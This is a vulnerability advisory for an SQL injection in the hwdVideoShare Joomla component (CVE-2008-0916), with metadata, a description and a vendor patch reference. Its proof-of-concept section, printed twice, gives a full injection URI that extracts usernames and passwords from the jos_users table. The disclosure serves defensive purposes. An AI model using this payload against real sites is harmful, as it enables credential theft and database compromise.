Highwood Design hwdVideoShare 'Itemid' Parameter SQL Injection Vulnerability
BID:27907
Info
Highwood Design hwdVideoShare 'Itemid' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 27907 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0916 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 20 2008 12:00AM |
| Updated: | May 07 2015 05:32PM |
| Credit: | S@BUN is credited with the discovery of this vulnerability. |
| Vulnerable: |
Highwood Design hwdVideoShare 0 |
| Not Vulnerable: | |
Discussion
Highwood Design hwdVideoShare 'Itemid' Parameter SQL Injection Vulnerability
hwdVideoShare is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
hwdVideoShare is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Highwood Design hwdVideoShare 'Itemid' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/000,111,222,username,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2/**/from/**/jos_users/*
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/000,111,222,username,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2/**/from/**/jos_users/*
Solution / Fix
Highwood Design hwdVideoShare 'Itemid' Parameter SQL Injection Vulnerability
Solution:
The vendor released updates to address this issue. Please see the references for more information.
Highwood Design hwdVideoShare 0
Solution:
The vendor released updates to address this issue. Please see the references for more information.
Highwood Design hwdVideoShare 0
-
Highwood Design Critical Security Patch for hwdVideoShare-1.1.3
http://joomla.highwooddesign.co.uk/component/option,com_docman/task,do c_download/gid,68/Itemid,26/
References
Highwood Design hwdVideoShare 'Itemid' Parameter SQL Injection Vulnerability
References:
References:
- hwdVideoShare Homepage (Highwood Design)